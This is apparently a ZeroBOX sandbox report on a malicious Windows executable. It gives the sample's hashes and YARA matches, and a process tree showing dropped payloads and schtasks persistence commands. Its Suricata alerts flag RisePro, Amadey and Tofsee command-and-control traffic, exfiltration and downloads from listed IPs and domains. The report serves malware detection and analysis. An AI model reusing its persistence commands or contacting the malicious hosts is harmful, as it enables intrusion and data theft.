Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 23, 2024, 7:55 a.m.	Jan. 23, 2024, 7:57 a.m.

Size	1.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`b367a4da8177d0be7638599aad1caa9b`
SHA256	`3b1c6930afaa617da6457a8bfca580e8739ef04301599e9e54f8f0bcfb194355`
CRC32	`B6866092`
ssdeep	`24576:jBLATEOrY43Fq2Be8Duj3UWn6wQLBaWnBCqtAV8nQ3v0lHGfYED:JAR1uTUHlLBaWntSeQcHGf`
Yara	IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature

face.exe "C:\Users\test22\AppData\Local\Temp\face.exe"
1792
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
  2444
- schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
  2552
- 8CEyWgPtgDj3ygdsYA34.exe "C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe"
  2724
  - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
    2776
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2776 CREDAT:145409
      2856
- n6P8X5rop5bCHCDpw23f.exe "C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\n6P8X5rop5bCHCDpw23f.exe"
  2100
  - explorhe.exe "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe"
    1020
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
      2112
    - latestrocki.exe "C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe"
      2544
      - InstallSetup7.exe "C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe"
        1340
        
        BroomSetup.exe C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
        2416
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\Temp\Task.bat" "
        2744
        
        chcp.com chcp 1251
        596
        
        schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        3108
        
        nsz9DA0.tmp C:\Users\test22\AppData\Local\Temp\nsz9DA0.tmp
        3376
      - toolspub1.exe "C:\Users\test22\AppData\Local\Temp\toolspub1.exe"
        3028
      - rty25.exe "C:\Users\test22\AppData\Local\Temp\rty25.exe"
        2668
      - 31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        2208
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      3160
    - SetupPowerGREPDemo.exe "C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe"
      3260
- Z2A_k3kHrLyUiJQeXEs0.exe "C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe"
  2672
- 8G51dyVKnnvS40g1JD2e.exe "C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe"
  2796
- KdWG1WnjbLO0ejuSam0V.exe "C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe"
  3024
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
accounts.google.com	A 173.194.174.84	64.233.188.84
apps.identrust.com	A 61.111.58.35 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 61.111.58.34	23.32.56.66
i.alie3ksgaa.com	A 154.92.15.189	154.92.15.189
ipinfo.io	A 34.117.186.192	34.117.186.192
www.google.com	A 142.251.220.68	142.250.76.132
www.fleefight.it	A 94.177.48.37	94.177.48.37
ssl.gstatic.com	A 216.58.200.227	142.250.207.99
db-ip.com	A 104.26.5.15 A 104.26.4.15 A 172.67.75.166	104.26.4.15

IP Address	Status	Action
104.26.4.15	Active	Moloch
109.107.182.3	Active	Moloch
117.18.232.200	Active	Moloch
142.251.220.68	Active	Moloch
154.92.15.189	Active	Moloch
164.124.101.2	Active	Moloch
173.194.174.84	Active	Moloch
185.172.128.109	Active	Moloch
185.172.128.19	Active	Moloch
185.172.128.53	Active	Moloch
185.172.128.90	Active	Moloch
185.215.113.68	Active	Moloch
193.233.132.62	Active	Moloch
216.58.200.227	Active	Moloch
34.117.186.192	Active	Moloch
61.111.58.35	Active	Moloch
87.251.77.166	Active	Moloch
94.177.48.37	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49165	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 193.233.132.62:50500	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 173.194.174.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49189 -> 216.58.200.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49188 -> 216.58.200.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49194	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 192.168.56.103:49199 -> 142.251.220.68:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49198 -> 142.251.220.68:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 185.215.113.68:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49180	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 173.194.174.84:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2014819	ET INFO Packed Executable Download	Misc activity
TCP 109.107.182.3:80 -> 192.168.56.103:49179	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49200 -> 185.172.128.19:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49200	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.19:80 -> 192.168.56.103:49200	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.172.128.19:80 -> 192.168.56.103:49200	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 109.107.182.3:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49194	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49194	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49194	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49228 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49229 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49231 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49232 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49233 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49234 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49236 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49237 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49239 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49245 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49246 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49244 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49241 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.233.132.62:50500 -> 192.168.56.103:49256	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49247 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49256 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 192.168.56.103:49248 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49253 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49238 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49251 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49257 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49552 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49340 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49642 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49648 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49323 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49645 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49650 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49470 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49263 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49647 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49653 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49639 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49655 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49661 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49644 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49663 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49646 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49667 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49649 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49652 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49651 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49656 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49659 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49660 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49657 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49662 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49674 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49676 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49668 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49684 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49681 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49691 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49673 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49692 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49671 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49677 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49669 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49675 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49670 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49678 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49194 -> 185.215.113.68:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.103:49672 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49685 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49683 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49679 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49686 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49680 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49688 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49687 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49689 -> 94.177.48.37:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49690 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49693 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49694 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49695 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49696 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49697 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49212 -> 87.251.77.166:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 87.251.77.166:80 -> 192.168.56.103:49212	2014819	ET INFO Packed Executable Download	Misc activity
TCP 87.251.77.166:80 -> 192.168.56.103:49212	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 87.251.77.166:80 -> 192.168.56.103:49212	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 87.251.77.166:80 -> 192.168.56.103:49212	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 185.172.128.90:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49250 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49249 -> 185.172.128.109:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49249 -> 185.172.128.109:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.109:80 -> 192.168.56.103:49249	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.172.128.109:80 -> 192.168.56.103:49249	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.109:80 -> 192.168.56.103:49249	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49259 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49259 -> 34.117.186.192:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49261 -> 104.26.4.15:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49641 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49643 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49654 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49658 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49664 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49666 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49682 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49698 -> 154.92.15.189:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49259 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 104.26.4.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.103:49185 173.194.174.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
TLSv1 192.168.56.103:49189 216.58.200.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49188 216.58.200.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	6f:8c:8c:6f:06:bf:0d:24:7e:8d:3d:09:0d:07:26:df:c3:6e:47:c0
TLSv1 192.168.56.103:49199 142.251.220.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49198 142.251.220.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	cf:73:8c:78:50:35:aa:62:03:1d:34:01:0d:0e:90:a3:9a:5f:0d:d9
TLSv1 192.168.56.103:49186 173.194.174.84:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=accounts.google.com	e1:91:9a:16:6f:2f:49:fb:1c:f6:d7:db:dd:f0:e2:b0:9f:34:cc:e4
